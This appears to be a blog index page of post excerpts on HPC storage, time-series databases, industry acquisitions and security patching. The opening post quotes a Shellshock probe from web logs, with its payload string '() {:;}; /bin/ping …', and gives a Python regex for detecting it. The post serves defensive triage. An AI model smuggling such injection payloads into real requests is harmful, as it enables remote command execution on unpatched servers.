This bad boy came from the University of Oklahoma, IP address 157.142.200.11. The ping address 104.131.0.69 is something called shodan.io. Patch this one, folks. Remote execution badness, and all that goes along with it.
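For triaging web logs like the two requests above, a simple pattern match on the telltale `() {` function-definition prefix used by Shellshock (CVE-2014-6271) payloads is often enough to flag candidates. This is a sketch of a log-triage heuristic, not a complete detector; the regex and the helper name `looks_like_shellshock` are illustrative assumptions.

```python
import re

# Shellshock payloads smuggle a bash function definition, "() {", into an
# environment variable (e.g. a CGI header). This flags that prefix only;
# it is a triage heuristic, not a complete detector.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def looks_like_shellshock(value: str) -> bool:
    """Return True if a header or log field contains '() {'-style text."""
    return bool(SHELLSHOCK_RE.search(value))


if __name__ == "__main__":
    samples = [
        "() {:;}; /bin/ping -c 1 104.131.0.69",  # request from the log above
        "Mozilla/5.0 (X11; Linux x86_64)",       # benign user agent (hypothetical)
    ]
    for s in samples:
        print(looks_like_shellshock(s), s)
```

The `\s*` allows for both the `() {` and `() {:` spellings seen in these logs. Matching is no substitute for patching bash, though.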
Posts
Interesting bits around EMC
In the last few days, issues around EMC have become publicly known. EMC is the world’s largest and most profitable storage company, and has a federated group of businesses that are complementary to it. The CEO, Joe Tucci, is stepping down next year, and there is a succession “process” going on. Couple this with a fundamental shift in storage, from arrays to distributed tightly coupled server storage, such as Unison, which is problematic for their core business.
Posts
sios-metrics code now on github
See link for more details. It allows us to gather many metrics, saves them nicely in the database. This enables very rapid and simple data collection, even for complex data needs.
Posts
Solved the major socket bug ... and it was a layer 8 problem
I’d like to offer an excuse. But I can’t. It was one single missing newline. Just one. Missing. Newline. I changed my config file to use port 10000. I set up an nc listener on the remote host.
```
nc -k -l a.b.c.d 10000
```

Then I invoked the code. And the data showed up. Without a ()&(&%&$%*&(^ newline. That couldn’t possibly be it. Could it? No. It’s way too freaking simple.
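Line-oriented receivers typically treat a record as complete only when the newline arrives, which is why one missing `\n` can make a sender look broken. The sketch below assumes the receiver speaks Graphite’s plaintext protocol (`<path> <value> <timestamp>\n`), as the collector in the next post does; the helper names are hypothetical.

```python
import socket
import time


def graphite_line(path: str, value: float, timestamp: int) -> bytes:
    """Format one metric in Graphite's plaintext protocol.

    The trailing newline terminates the record; a line-oriented receiver
    may not treat the data as a complete record without it.
    """
    return f"{path} {value} {timestamp}\n".encode("ascii")


def send_metric(host: str, port: int, path: str, value: float) -> None:
    """Open a TCP connection and send a single newline-terminated metric."""
    line = graphite_line(path, value, int(time.time()))
    with socket.create_connection((host, port), timeout=5) as sock:
        sock.sendall(line)
```

Pointing `send_metric` at the `nc -k -l` listener above (same host and port 10000) is a quick way to eyeball exactly what goes over the wire, newline included.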
Posts
New monitoring tool, and a very subtle bug
I’ve been working on coding up some additional monitoring capability, and had an idea a long time ago for a very general monitoring concept. Nothing terribly original, not quite nagios, but something easier to use/deploy. Finally I decided to work on it today. The monitoring code talks to a graphite backend. Could talk to statsd, or other things. In this case, we are using the InfluxDB plugin for graphite. I wanted an insanely simple local data collector.
Posts
New 8TB and 10TB drives from HGST, fit nicely into Unison
The TL;DR version: Imagine 60x 8TB drives (480TB about 1/2 PB) in a 4U unit or 4.8PB in a rack. Now make those 10TB drives. 600TB in 4U. 6PB in a full rack. These are shingled drives, great for “cold” storage, object storage, etc. One of the many functions that Unison is used for. These aren’t really for standard POSIX file systems, as your read-modify-write length is of the order of a GB or so, on a per drive basis.
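The capacity figures above are straightforward multiplication. This sketch assumes raw, decimal capacity and 10 of the 60-drive 4U chassis per rack, which is what the quoted 4.8PB/rack implies; the names are illustrative.

```python
def capacity_tb(drives: int, drive_tb: float) -> float:
    """Raw capacity in TB for one chassis."""
    return drives * drive_tb


DRIVES_PER_CHASSIS = 60
CHASSIS_PER_RACK = 10  # assumption: 10 x 4U chassis per rack (40U)

for drive_tb in (8, 10):
    per_4u = capacity_tb(DRIVES_PER_CHASSIS, drive_tb)
    per_rack_pb = per_4u * CHASSIS_PER_RACK / 1000
    print(f"{drive_tb} TB drives: {per_4u:.0f} TB per 4U, {per_rack_pb:.1f} PB per rack")
```

These are raw numbers; usable capacity depends on the erasure coding or RAID layout chosen on top.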
Posts
The Haswells are (officially) out
Great article summarizing information about them here. Of course, everyone and their brother put out press releases indicating that they would be supporting them. Rather than add to that cacophony (ok, just a little: All Scalable Informatics platforms are available with Haswell architecture, more details including benchies … soon …) we figured we’d let it die down, as the meaningful information will come from real user cases. Haswell is interesting for a number of reasons, not the least of which is 16 DPi/cycle, but fundamentally, it’s a more efficient/faster chip in many regards.
Posts
Be sure to vote for your favorites in the HPCWire readers choice awards
Scalable Informatics is nominated in
- #12 for Best HPC storage product or technology,
- #20 Top supercomputing achievement, which could be for this, this on a single storage box, or this result,
- #21 Top 5 new products or technologies to watch, for our Unison, and
- #22 for Top 5 vendors to watch

Our friends at Lucera are nominated for #4, Best use of HPC in financial services. Please do vote for us and our friends at Lucera!
Posts
InfluxDB cli is up on github
I know there is a node version, and I did try it before I wrote my own. Actually, the reason I wrote my own was that I tried it and … well … Link is here. And yes, the readme is borked about 1/2 way through. It doesn’t quite show the formatting of the output correctly. Will try to fix over the weekend, as I move this to a far more feature-complete bit.
Posts
Time series databases for metrics part 2
So I’ve been working with influxdb for a while now, and have a working/credible cli for it. I’ll have to put it up on github soon. I am using it mostly as a graphite replacement, as it’s a compiled app rather than Python code, and Python isn’t terribly fast for this sort of work. We want to save lots of data, and do so with 1 second resolution. Imagine I want to save a 64 bit measurement, and I am gathering say 100 per second.
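To put that scenario in numbers, here is a back-of-the-envelope sketch. It assumes 8 bytes per 64-bit sample and counts payload only, ignoring timestamps, series names, and any index or compression overhead of the database.

```python
# Raw payload arithmetic for a 1-second-resolution metric stream.
# Assumption: payload only; timestamps, series names and index/compression
# overhead are ignored.
BYTES_PER_SAMPLE = 8  # one 64-bit measurement
SAMPLES_PER_SECOND = 100
SECONDS_PER_DAY = 86_400


def raw_bytes(seconds: int, rate: int = SAMPLES_PER_SECOND,
              width: int = BYTES_PER_SAMPLE) -> int:
    """Payload bytes for `rate` samples/s of `width` bytes over `seconds`."""
    return seconds * rate * width


per_day = raw_bytes(SECONDS_PER_DAY)
per_year = raw_bytes(365 * SECONDS_PER_DAY)
print(f"{per_day:,} bytes/day (~{per_day / 1e6:.1f} MB)")
print(f"{per_year:,} bytes/year (~{per_year / 1e9:.1f} GB)")
```

This prints 69,120,000 bytes/day (~69.1 MB) and 25,228,800,000 bytes/year (~25.2 GB). Storing an 8-byte timestamp next to each value would double both figures before any database overhead.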
Posts
Have a nice cli for InfluxDB
I tried the nodejs version and … well … it was horrible. Basic things didn’t work. Made life very annoying. So, being a good engineering type, I wrote my own. It will be up on our site soon. Here’s an example
```
./influxdb-cli.pl --host 192.168.5.117 --user test --pass test --db metrics
metrics> \list series
.----------------------------------.
| series name |
+----------------------------------+
| lightning.cpuload.avg1 |
| lightning.cputotals.idle |
| lightning.cputotals.irq |
| lightning.
```
Posts
Scalable Informatics 12 year anniversary
I had forgotten to mention, but we hit our 12 year mark on the 1st of August. We’ve grown from a small “garage” based company (really “basement-based” in Michigan, as garages aren’t heated in winter, nor cooled in summer here), with one guy doing consulting, cluster system builds, tuning, benchmarking, white paper writing … to a 10 person outfit building the world’s fastest and densest tightly coupled storage and computing systems.
Posts
Time series databases and system metrics
I am working on updating our FastPath appliance web management/monitoring gui for the day job. Trying to push data into databases for later analysis. Many tools have been written on the collection side, statsd, fluentd, … and some are actually pretty cool. The concern for me is the way these tools express their analytical and storage opinions, which is done on the storage side. The data collection side isn’t an issue, if anything, its a breath of fresh air relative to what else I’ve seen.
Posts
The best thing one can do with the tuned system is
```
yum remove tuned tuned-utils
```

This isn’t quite as bad as THP, but it’s close.
Posts
Soon ... 12g goodness in new chassis
This is one of our engineering prototypes that we had to clear space for. A couple of new features I’ll talk about soon, but you should know that these are 12g SAS machines (will do 6g SATA of course as well).
Front of unit:
[ ](/images/IMG_2330.JPG)
Note the new logo/hand bar. The rails are also brand new, and are set to enable easy slide in/out even with 100+ lbs of disk in them.
Posts
But ... GaAs is the material of the future ... and always will be ...
I read a note on IBM’s recent allocation of capital towards research projects. It had this tidbit in there:
Well, there are a range of III-V materials. Not just GaAs. One of the big issues is the lattice mismatch between Si and many of the III-V materials. This strain introduces “artifacts” in the band structure, not to mention structural morphologies. This said, those artifacts may be what the engineers want. Aluminum phosphide and gallium phosphide are pretty well matched to Si.
Posts
Too simple to be wrong
I’ve been exercising my mad-programming skillz for a while on a variety of things. I got it in my head to port the benchmarks posted on julialang.org to perl a while ago, so I’ve been working on this in the background for a few weeks. I also plan, at some point, to rewrite them in q/kdb+, as I’ve been really wanting to spend more time with it. The benchmarks aren’t hard to rewrite.
Posts
OS and distro as a detail of a VM/container
An interesting debate came about on the Beowulf list. Basically, someone asked if they could use Gentoo as a distro for building a cluster, after seeing a post from someone who did something similar. The answer of course is “yes”, with the more detailed answer being that you use what you need to build the cluster and provide the cycles that you or your users will consume. Hey, look, if someone really, truly wants to run their DOS application, Tiburon/Scalable OS will boot it.
Posts
Scratching my head over a weird bonding issue
Trying to set up a channel bond into a 10GbE LAG. Set up the bonding module, using the ‘miimon=200 mode=802.3ad’ options. The switch was sending LACP packets, 1/sec, to the NICs. The bond formed on the NIC side. But it didn’t seem to negotiate the LACP circuit correctly with the switch. The switch never registered it. I’ve not seen that one before. With Mellanox, Arista, Cisco, and others like that, the LACP circuit forms correctly and quickly.
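One way to see which side of an 802.3ad link is unhappy is to decode the LACP port-state octet that each end advertises. Each bit is a flag defined in IEEE 802.1AX, and a port that is really in the aggregate normally shows Synchronization, Collecting and Distributing. This is a sketch: it assumes you can obtain the partner’s numeric state (recent Linux kernels print a "port state" value per slave in `/proc/net/bonding/bond0`, though the exact layout varies by kernel version), and the helper names are hypothetical.

```python
# Bit positions of the LACP actor/partner state octet (IEEE 802.1AX).
LACP_STATE_BITS = {
    0x01: "LACP_Activity",
    0x02: "LACP_Timeout",
    0x04: "Aggregation",
    0x08: "Synchronization",
    0x10: "Collecting",
    0x20: "Distributing",
    0x40: "Defaulted",
    0x80: "Expired",
}


def decode_lacp_state(state: int) -> set[str]:
    """Return the names of the flags set in an LACP state byte."""
    return {name for bit, name in LACP_STATE_BITS.items() if state & bit}


def link_aggregated(partner_state: int) -> bool:
    """True if the partner reports the port in sync and forwarding."""
    needed = {"Synchronization", "Collecting", "Distributing"}
    return needed <= decode_lacp_state(partner_state)
```

For example, a state of 61 (0x3D) decodes to Activity, Aggregation, Synchronization, Collecting and Distributing, a healthy member. A partner state with Defaulted set and the sync bits clear would match the “switch never registered it” symptom.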
Posts
New customers
We have a number of nice new customers that have been absorbing about all of my time for the last few weeks. This is goodness. One has our current generation FastPath Cadence SSD converged computing and storage system, and will be running kdb+ on it. Another has a 1PB Unison parallel file system, and while we did the previous 2TB write in 73 seconds with it, we did some tuning and tweaking and are down to 68 seconds.
Posts
M&A: PLX snarfed by ... Avago ?
Ok, didn’t see this acquirer coming, but PLX being bought … yeah, this makes sense. Avago looks like they are trying to become the glue between systems, whether the glue is a data storage fabric, or communications fabric, etc. PLX makes PCIe switches and other kit. PCIe switch and interconnection is the direction that many are converging to. Best end to end latencies, best per-lane performance, no protocol stack silliness to deal with.
Posts
M&A: SanDisk snarfs FusionIO for $1.1B USD
This is only the beginning folks … only the beginning. See this. FusionIO was, quite arguably, in trouble. They needed a buyer to take them to the next level, and to avoid being made completely irrelevant. SanDisk is a natural partner for them. They have the fab and chips, FusionIO has a product. SanDisk has a vision for a flash-only data center. What’s interesting about this is that Fusion was sort of the last independent enterprise class PCI Flash vendor.
Posts
Selling inventory to clear space
[Update 16-June] We’ve sold the 64 bay FastPath Cadence (siFlash based), and now we have a few more 60 bay hybrid Ceph and FhGFS units, as well as a 48 bay front mount siFlash. What’s coming in are many of our next gen 60 bay units, with a new backplane design, and we want to start running benchmarks with them ASAP. As we have limited space in our facility, we gotta make hard choices … Email me (landman@scalableinformatics.
Posts
Divestment: Violin sells off PCIe flash card
This article notes that Violin has divested itself of its PCIe flash card. This card was, to a degree, a shot across the Fusion IO/Virident/Micron bows. I don’t think it ever was a significant threat to them though. Terms of the sale indicate about $23M cash and assumptions of $0.5M liabilities, as well as hiring the team. What is interesting is where it was sold. Hynix. Yes, the memory chip/flash maker.
Posts
M&A: Seagate acquires LSI's flash and accelerated bits from Avago
I’ve been saying for a while that M&A is going to get more intense as companies gird for the battles ahead. I see component vendors looking at doing vertical integration … not necessarily to compete with their customers, but to offer them alternatives, reference designs, etc. and capture a portion of the higher margin businesses. This move gives Seagate control over Sandforce controllers, and PCIe flash. See this link for more info.
Posts
Massive, unapologetic, firepower: 2TB write in 73 seconds
A 1.2PB single mount point Scalable Informatics Unison system, running an MPI job (io-bm) that just dumps data as fast as the little Infiniband FDR network will allow. Our test case. Write 2TB (2x overall system memory) to disk, across 48 procs. No SSDs in the primary storage. This is just spinning rust, in a single rack. This is performance pr0n, though safe for work.
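Turning the wall-clock times into bandwidth makes the result easier to compare. This sketch assumes decimal units (2 TB = 2×10¹² bytes) and an even split across the 48 MPI processes, and it also covers the tuned 68-second figure from the “New customers” post. Names are illustrative.

```python
def throughput_gbs(bytes_written: float, seconds: float) -> float:
    """Average write rate in GB/s (decimal: 1 GB = 1e9 bytes)."""
    return bytes_written / seconds / 1e9


TOTAL_BYTES = 2e12  # 2 TB, assuming decimal terabytes
PROCS = 48          # MPI processes in the io-bm run

for seconds in (73, 68):
    agg = throughput_gbs(TOTAL_BYTES, seconds)
    print(f"{seconds} s: {agg:.1f} GB/s aggregate, {agg / PROCS:.2f} GB/s per process")
```

That works out to about 27.4 GB/s aggregate at 73 seconds and 29.4 GB/s at 68 seconds, sustained from spinning disk in a single rack.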
```
usn-01:/mnt/fhgfs/test # df -H /mnt/fhgfs/
Filesystem      Size  Used Avail Use% Mounted on
fhgfs_nodev     1.
```
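A quick back-of-envelope check of what “2TB in 73 seconds across 48 procs” means as a rate. This is a sketch under stated assumptions, not the io-bm output itself: it assumes decimal terabytes (10^12 bytes), and for comparison it assumes a 4x FDR InfiniBand link at 56.25 Gb/s signaling with 64b/66b encoding, ignoring protocol overhead.

```python
import math

# Figures from the post: 2 TB written by 48 MPI processes in 73 seconds.
TOTAL_BYTES = 2e12      # assumption: decimal TB (10**12 bytes)
SECONDS = 73
PROCS = 48

# Assumption: one 4x FDR InfiniBand link, 56.25 Gb/s signaling, 64b/66b encoding.
FDR_LINK_BYTES_PER_S = 56.25e9 * 64 / 66 / 8

aggregate = TOTAL_BYTES / SECONDS          # bytes/s across the whole job
per_proc = aggregate / PROCS               # average bytes/s per MPI rank
min_links = math.ceil(aggregate / FDR_LINK_BYTES_PER_S)

print(f"aggregate:   {aggregate / 1e9:.1f} GB/s")
print(f"per process: {per_proc / 1e6:.0f} MB/s")
print(f"minimum 4x FDR links: {min_links}")
```

At roughly 27.4 GB/s aggregate (about 571 MB/s per rank), the write stream needs more than four FDR links’ worth of bandwidth, so it cannot be riding on a single link.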
Posts
Insanity in vendor distros
I am not sure if this is specific to SuSE (customer requirement, don’t ask), but there is some extreme … and I really, positively mean, EXTREME … boneheaded insanity in the dhcp stack in the initrd construction in SuSE. Something that doesn’t lend itself well to, I dunno … CORRECT AUTOCONFIGURATION OF NETWORK PORTS IN DISKLESS ENVIRONMENTS. Ok, what clued me in was this snippet from the console I’ve been struggling with for the past day.
Posts
io-bm released
At long last, and yes, I can’t believe I let this slip for years … It’s available here, at our git site.
Posts
Our new look and feel
Day job website has been updated to something … modern. Hopefully nothing is broken … I think it looks great; the Dougs did a terrific job. Seriously, I wound up breaking DNS at the day job (by accident … really) yesterday, in order to try to rationalize something. Had to roll back our DNS servers to an older code drop. That and I had to spin up a new dedicated mail/dns internal server.
Posts
Building efficient storage and computing platforms has little to do with using cheap hardware
This has been bugging me for a long time, and we have to address this in every discussion we have. You can’t build cost effective scale out systems on cheap-ass hardware designs. It’s woefully inefficient: the cost blows up to achieve the type of performance we can often achieve with an order of magnitude fewer systems (hey … that’s less acquisition cost, less TCO, less power/cooling, lower management strain, smaller footprint, tastes great, less filling, …). The only way people recognize this is when they actually try it themselves.
Posts
M&A: Inktank acquired by Red Hat
I am happy for Sage and team, this is a good exit. Obviously we didn’t know this was happening, but I guessed something like this a few weeks ago. Bigger picture: Open source technologies have been capturing mindshare from closed source object, file, and block for a while. This will serve to massively amplify this. GlusterFS was niche until Red Hat bought it. Then it went mainstream. Ceph isn’t GlusterFS though.
Posts
When ideology trumps pragmatic design
Real differentiation, adding real value to something, is often hard to do. Fundamental changes often take time, and are often incremental in scope, so they don’t break everything. That is, unless you are so completely convinced that your way is better, that you try to force the market in that direction. Sometimes these gambits work. Sometimes they don’t. This is about one that did not work. I am convinced my Mac OSX laptop may be the best laptop I’ve used.
Posts
busy last two weeks, and lots of traveling next two weeks
We’ve been cranking out the products to ship to customers, and I’ve been fretting over tests, as usual. And I finished my initial pass at the automated installer. It builds our new Debian based systems very nicely, though there is still a little human interaction. Working on it. And it should work perfectly for Ubuntu as well. Have an install in Hollywood this week. New market for us, very interesting and it plays completely to our strengths.
Posts
when the networking revolution comes, the cheap switches will be the first ones against the wall
Seriously … no more cheap switches as the central point of information flow in storage or computing clusters. The money you save will be blown in the first hour you pay for down time or architectural changes you need to actually move your data without tossing packets on the ground … … because while standard network codes don’t care so much if they need to retransmit or lose data, cluster file systems get very … very … testy when data doesn’t arrive when and where it is supposed to, in the right order, because the cheap-ass switch was too busy tossing packets on the floor.
Posts
Slides from HPC on Wall Street Spring 2014 are up
See here. Very good conference, lots of good discussion.
Posts
hate to be an alarmist, but Heartbleed is worse than I had thought it was
TL;DR: Run, as in now, before you finish reading this, to update vulnerable OpenSSL packages. Restart your OpenSSL using services (ssh, https, openvpn). Then nuke your keys, and start all over again. Yeah, it’s that bad. I had hoped, incorrectly, that no one would start asking, “hey, can we exploit this in the wild?” any time soon. Unfortunately … exploits are live and out there. Have a look at this session hijacking done using the bug.
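A heuristic sketch for a first look at which OpenSSL a Python runtime is linked against. It only compares the version string with the Heartbleed-affected 1.0.1 through 1.0.1f range (1.0.1g carried the fix). It ignores the 1.0.2 betas, which were also affected, and distros often backport the fix without changing the version letter, so a positive means “check your package changelog”, not proof. The function name is hypothetical, and it says nothing about what other services on the box are linked against.

```python
import re
import ssl


def heartbleed_affected(version_string: str) -> bool:
    """Heuristic: True if the string names OpenSSL 1.0.1 through 1.0.1f."""
    m = re.search(r"OpenSSL (\d+)\.(\d+)\.(\d+)([a-z]?)", version_string)
    if not m:
        return False  # not an OpenSSL version string we recognize
    major, minor, patch, letter = int(m[1]), int(m[2]), int(m[3]), m[4]
    if (major, minor, patch) != (1, 0, 1):
        return False
    # Plain 1.0.1 and letters a..f are in the affected range; g and later are fixed.
    return letter == "" or letter <= "f"


if __name__ == "__main__":
    print(ssl.OPENSSL_VERSION, "->", heartbleed_affected(ssl.OPENSSL_VERSION))
```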
Posts
Sometimes things work far better than one might expect
The day job builds a storage product which integrates Ceph as the storage networking layer. What happened was, in idiomatic American English: We made very tasty lemonade out of very bitter lemons. For the rest of the world, this means we had a bad situation during our setup at the booth. 3 boxes of drives and SSDs. 2 of them arrived. The 3rd may have been stolen, or gone missing, or wound up in a shallow grave somewhere.
Posts
Sometimes the right level of caffeination helps in work
I had an opportunity to review an old post I had written about playing with prime numbers. In it, I wrote out an explicit formula for a number, expressed as a product of primes. This goes to the definition of a composite or a prime number. What’s interesting is what leaps out at you when you look at something you wrote a while ago. Looking at the formula I wrote down, there is a very easy way to define if a number is prime or composite.
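The original formula isn’t reproduced in this excerpt, so this is a sketch of the standard statement it builds on, not necessarily the post’s formula: every n ≥ 2 factors uniquely as n = p1^a1 × p2^a2 × … × pk^ak, and n is prime exactly when the exponents sum to 1 (a single prime to the first power). Trial division is used purely for simplicity, and the function names are illustrative.

```python
def factorize(n: int) -> dict[int, int]:
    """Return {prime: exponent} for n >= 2, using trial division."""
    if n < 2:
        raise ValueError("n must be >= 2")
    factors: dict[int, int] = {}
    p = 2
    while p * p <= n:
        while n % p == 0:
            factors[p] = factors.get(p, 0) + 1
            n //= p
        p += 1
    if n > 1:  # whatever is left over is itself a prime factor
        factors[n] = factors.get(n, 0) + 1
    return factors


def is_prime(n: int) -> bool:
    """n is prime exactly when the exponents in its factorization sum to 1."""
    return sum(factorize(n).values()) == 1


print(factorize(360), is_prime(97), is_prime(91))
```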
Posts
Doing what we are passionate about
I am lucky. I fully admit this. There are people out there who will tell you that it’s pure skill that they have been in business and been successful for a long time. Others will admit luck is part of it, but will again, pat themselves on the back for their intestinal fortitude. Few will say “I am lucky”. Which is a shame, as luck, timing (which you can never really, truly, control), and any number of other factors really are critical to one being able to have the luxury of doing what we are doing.
Posts
Negative latencies
I’ve been thinking for a while that our obsession with reduction of latency in computing and storage could be ameliorated by exploiting a negative latency design. A negative latency design would be one where a hypothetical message would arrive at a receiver before the sender completed sending it. There are a few issues with this. First off is how on earth, or elsewhere, is this possible? Second, aren’t there issues with causality violations?
Posts
HPC on Wall Street session on low latency cloud
See here for the program sheet. The session is here: HPC on Wall Street Flyer. The description reads:
Wall Street and the global financial markets are building low latency infrastructures for processing and timely response to information content in massive data flows. These big data flows require architectural design patterns at a macro- and micro-level, and have implications for users of cloud systems. This panel will discuss, from macro to micro, how new capabilities and technologies are making a positive impact.
Posts
Intel ditches own Hadoop distro in favor of Cloudera
Last year, Intel started building its own distro of Hadoop. Their argument was that they were optimizing it for their architecture (as compared to, say, ARM). Today came word (via InsideHPC.com) that they are switching to Cloudera. This makes perfect sense to me. Intel couldn’t really optimize Hadoop by compiler options to use new instruction capability (part of their selling point), as Hadoop is a Java thing. And Java has its own VM, and many performance touch points that have nothing to do with processor architecture.
Posts
Nice interview with Freeman Dyson
Freeman Dyson is an incredible scientist. I imagine he, Terence Tao, Paul Erdős and a number of others are all woven from the same cloth. Dyson has done some amazing work, and probably will do some more amazing work. The interview is here. One of the comments he made really struck me as being dead on correct …
I’ve used similar language, describing a Ph.D. as a union card. And I agree it takes far too long in physics.
Posts
Free market forces at work, the way they should be
There’s a much publicized (in SV) trial going on over an oligarchic wage suppression scheme that was in force between a number of big players in SV. Apart from Facebook that is. Techcrunch has the details. What transpires when free market forces are allowed to work with their invisible hands unconstrained? Simple.
Kudos to Facebook for doing the right thing, though in all honesty, I don’t attribute this to altruism on their part.
Posts
Staring into voids that stare back
I had mentioned this in my write up about our 10 year anniversary.
And this post yesterday from Scott Weiss at Andreessen Horowitz
It’s in that staring deep and hard into the yawning void that one gets their inspiration. Call it sheer abject terror, or motivation. Whatever. It juices your processors into overdrive if you are an entrepreneur. You are at your most creative when you are at your most fearful.
Posts
Good read on ageism in SV VCs
Oddly enough at the New Republic. Article is here. I was somewhat amused by the read, but some of it rang quite true. It’s nice to hear of more of the signals one needs to read VC tea leaves. They never say no, but they do move goal posts, always outward, always away from you. The article implies they get hung up on TAM, as a proxy for what they really think.
Posts
Unicode and python 64 bit build
[Update] I gave up on 2.7.x. Nothing I did made it work. I removed all the options apart from prefix for compilation of 3.4.0. That worked. Now on to building ipython, ijulia and other good things (SciPy stack). We will use 3.x going forward rather than try to remain compatible with 2.x. We are updating our tool chain to include a modern python which will be outside of the distro version. Long … long experience dealing with distro based tools has been that they are usually … badly … out of date.
Posts
SIOS Inst
Ok, I am taking the leap. I’ve started working on the SIOS Inst system. Basically, after reviewing everything that’s broken (and for that matter unfixable) in the anaconda, debian-installer, and other installation mechanisms, I’ve decided that for our purposes, the only way that we are going to get correct and reliable builds for stateful systems is to forgo these systems’ advanced installation mechanisms. If we can skip the code entirely, we will.
Posts
HPC on Wall Street
Not only do we have a booth, but we are sponsoring a session on Low Latency Cloud and Big Data. Roosevelt Hotel in NYC on 7-April. See the site for more details. If you’d like to attend and need a pass, please contact me at the day job. Our partners Lucera, Inktank, and Pluribus Networks will be there with us. Possibly more.
Posts
Not so fast ...
Well, after nearly a decade of hoopla over a realization of a quantum computer, an interesting study found that it was
There are a few important elements of this … it uses 1/5th the number of qubits that the newer generation machine used. But it wasn’t, as earlier reported, thousands of times faster.
Way back in the day, when working on benchmarking big machines, and comparing performance, one of the major criteria was using identical (or as near to identical) algorithms as possible to assess machine speed, compiler quality, etc.
Posts
Which (computer) language to learn next?
Ok, one of my professional goals is to learn a new computer language. I am at master level in several, proficient in others, and have working knowledge of a fair number. I’ve forgotten more than I care to admit about some (Fortran, Basic, C/C++, APL, x86 Assembler). The contenders for me should be useful languages. These are not things that should be learned for the sake of learning, but for real useful purposes.
Posts
OT: AirBnB and their issues
Ok, this one is sad. Saw this linked off of hacker news. I am not sure if this is satirical, humorous, or real. It doesn’t quite matter though. We’ve used AirBnB twice now. And we have a firm policy, as a direct result of those very negative experiences, of never … ever … using it again. To be fair, AirBnB is effectively a market maker dealing with the commodity of unused space which could be turned into a profitable asset.
Posts
Playing with several noSQL/document/tuple/time series DBs
We’ve been using MongoDB for a while for a number of things, internally, and thinking about using it for Tiburon as the restful interface. It has some nice aspects about it, but it also has some known issues for larger DBs. Considering what we want to do for some of our work, these larger DB issues are potentially problematic for us. Basically, MongoDB is one of the class of mmap’ed DBs.
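For readers unfamiliar with the term, an mmap’ed DB maps its data files into the process address space and reads and writes them as memory, leaving it to the kernel’s page cache to decide which pages are resident. That means the kernel, not the database, decides what stays in RAM, which is one reason behavior can change once the data outgrows memory. The sketch below is a toy fixed-size record store using Python’s `mmap` module; the record layout and function names are hypothetical and have nothing to do with MongoDB’s actual on-disk format.

```python
import mmap
import os
import struct
import tempfile

# Hypothetical fixed-size record layout: little-endian int64 key, float64 value.
RECORD = struct.Struct("<qd")


def write_records(path, records):
    """Size the file, map it, and write records straight into the mapping."""
    size = RECORD.size * len(records)
    with open(path, "wb") as f:
        f.truncate(size)  # extend the empty file to its final size (zero-filled)
    with open(path, "r+b") as f, mmap.mmap(f.fileno(), size) as mm:
        for i, (key, value) in enumerate(records):
            RECORD.pack_into(mm, i * RECORD.size, key, value)
        mm.flush()  # ask the kernel to write dirty pages back to the file


def read_record(path, index):
    """Read one record; the kernel pages it in on first touch."""
    with open(path, "rb") as f, mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ) as mm:
        return RECORD.unpack_from(mm, index * RECORD.size)


if __name__ == "__main__":
    fd, path = tempfile.mkstemp()
    os.close(fd)
    try:
        write_records(path, [(k, k * 0.5) for k in range(1000)])
        print(read_record(path, 42))  # (42, 21.0)
    finally:
        os.remove(path)
```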
Posts
Retired Apache as web server
This has been a long time coming for me. I’ve been using Apache in one form or another since the 90’s. I’ve never found it easy to configure, and often ran into maddening bugs in the config files and how they interacted with the server itself. I’d taken a long time to evaluate the various alternatives. Lighttpd caught my fancy for a while, but I ran into similar problems with config.
Posts
Couldn't have said it better myself ...
Robin at StorageMojo has an interesting article up (right after the one about Violin maybe being dead). I won’t comment on that second one, other than to say I disagree with his analysis and conclusions. As the day job is nominally a competitor (we’ve seen them in a deal, once) I am biased. But the fundamental analysis simply doesn’t look good for them (or Fusion, or …). They need a larger player to buy them.
Posts
The resurrection of autoinst ...
A long time ago, in a galaxy far, far away … I worked for this company named SGI. SGI machines and software were awesome … I had used them (R3k and R8k) for doing calculations for my thesis. Very very fast. But very hard to install/manage. In fact, brutally hard. This was not lost on customers with many of these devices. One of those customers read SGI the riot act on this.
Posts
Good read on the faux-STEM shortages
Good post over at Math Blog. There is no shortage of STEM folks in the US, and there hasn’t been for a long … long time. Any real shortage of STEM folks would show up in a number of economic indicators: 1) rapidly rising compensation rates (economic scarcity impacts upon costs of labor), 2) very short job search times for STEM folks, 3) additional market based initiatives to find and retain STEM folks.
Posts
Reality vs what one might like
Many years ago, I had this thought in my head that I wanted to be a physics professor. No, really. I went through all the motions. Undergrad BS, then MS and then PhD. While I was doing this, the Soviet Union collapsed. How was that fact related to my former desire to be a physics prof? Simple. It’s economics. It’s always economics. Anyone who tells you differently is either lying or selling you something.
Posts
Just created a new external dns on Digital Ocean
About 2 years ago, we had an issue with an internal server blowing up, taking data and config with it. I resolved to place some of our core infrastructure (external DNS, etc.) beyond our virtual boundaries, so we could maintain email/web presence in the event of a power or server issue. This has proven to be a prescient and wise move. We started out on Amazon with their small instances. And started out with dnsmasq, as I didn’t want to re-learn bind and all that config.
Posts
Our second(!) Unison FhGFS based unit
Burning in … Hammering on all disks, while computing pi, e, sqrt(2), … It is a thing of beauty …
[ ](/images/unison.png)
First one was an Isilon replacement. We seem to have many more of these in queue.
Posts
A must-read on HD selection
Henry could probably write far more in depth about this subject than he did. Regardless, this is a must-read article. Now it is important to understand where you can use each technology, and Henry does a great job of explaining some of these. However, it’s important to note that as some of the file system and device bits are pushed into higher levels in the stack, some of the functionality becomes redundant at the lower levels.
Posts
Big blue blues?
I remember my two stints at IBM T.J. Watson very well … first as a summer student (college hire for summer), and then as an engineer after finishing undergraduate. It was a wonderful place. I really enjoyed it. Not simply computer nerd heaven, but physical scientist nerd heaven as well. IBM famously was the company that resisted layoffs and downsizing for a long time. But it eventually gave in, and was forced into RIF actions during their troubled times in the 1990’s and 2000’s.
Posts
In 18 months ...
… I’ll have hit 10 years of blogitude … bloggerisms … er … generation of large amounts of noise and heat, and hopefully at least a little light? Mebbe?
Posts
Excellent article on Lucera's financial cloud
… that the day job is building atop our siCloud platform. In the article (definitely read it!) there is a great discussion about what the fundamental differences are between what Lucera is aiming for and what more traditional commodity cloud vendors are focused upon. When it comes down to it, the difference is architecting for density of VMs in the commodity cloud versus architecting for performance and low latency in the performance cloud (Lucera’s).
Posts
Does fibre channel have a future?
